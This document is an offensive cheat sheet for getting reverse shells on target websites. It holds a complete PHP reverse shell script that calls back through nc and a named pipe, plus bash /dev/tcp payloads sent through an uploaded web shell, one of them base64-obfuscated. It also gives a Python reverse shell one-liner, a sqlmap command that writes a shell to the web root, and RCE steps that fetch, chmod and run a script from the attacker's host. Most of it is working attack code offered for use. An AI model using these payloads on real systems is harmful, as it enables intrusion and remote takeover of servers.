Web Reverse Shell
We can get a shell by putting the reverse shell payload into target website.
PHP Reverse Shell (Linux)
# From local script (it's stored by default in Kali or Parrot)
cp /usr/share/webshell/php/php-reverse-shell.php ./shell.php
# From repo (https://github.com/pentestmonkey/php-reverse-shell)
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# From repo (https://github.com/flozz/p0wny-shell)
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O shell.php
Replace the $ip and the $port in the script with your local ip and port.
Without fsockopen, and for FreeBSD
<?php
set_time_limit (0);
$ip = '10.0.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a pipe that the child will write to
);
$cwd = "/tmp";
$env = array('some_option' => 'aeiou');
$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f');
fclose($pipes[0]);
echo stream_get_contents($pipes[1]);
fclose($pipes[1]);
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>
Using Web Shell
Create a PHP script to allow us to execute arbitrary command.
Then upload it to target website.
Now we might be able to execute arbitrary command, in short, reverse shell as below.
curl https://victim.com/uploads/shell.php?test='bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"'
# Base64 encoded payload
curl https://victim.com/uploads/shell.php?test='echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjEi | base64 -d | bash'
PHP Revese Shell (Windows)
Below are the available payloads.
- https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php
- https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse Shell.php
Python Reverse Shell (Linux)
It's required to upload a payload and command execution in the target website for successful.
First, create a Python file e.g. "revshell.py". Replace the ip and the port with your own.
# revshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])
Then upload it to the target website.
Next start a listener in local machine.
Now we need to command execution by somehow in the target website.
If success, we should get a shell.
ASP.NET
We can use .aspx file for reverse shell.
Download from here.
Upload Script via SQLi
# req.txt: The request settings file which is saved using Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php
Useful Tools
-
A web shell generator.
-
Generate Backdoor with Password
Credentials required.
-
Upload the Payload to Target Website and Execute Commands
-
Get a Shell
-
Shell Script & Remote Code Execution (RCE)
If we can find a website is vulnerable to Remote Code Execution but cannot Reverse Shell, we may be able to do that by uploading the script.
1. Create a shell script to reverse shell.
This file is named "revshell.sh".
2. Upload the script to website
Start web server in local machine to upload the script.
Then upload it by remote code execution in target website.
https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
# or
https://vulnerable.com/?cmd=curl <local-ip>:8000/revshell.sh
To confirm the script uploaded, execute the following RCE.
3. Get a shell
Start listener for getting a shell in local machine.
Now execute the uploaded script via RCE.
# 1. Change permission for the script
https://vulenrable.com/?cmd=chmod 777 revshell.sh
# 2. Execute the script
https://vulnerable.com/?cmd=./revshell.sh
We should now get the target shell.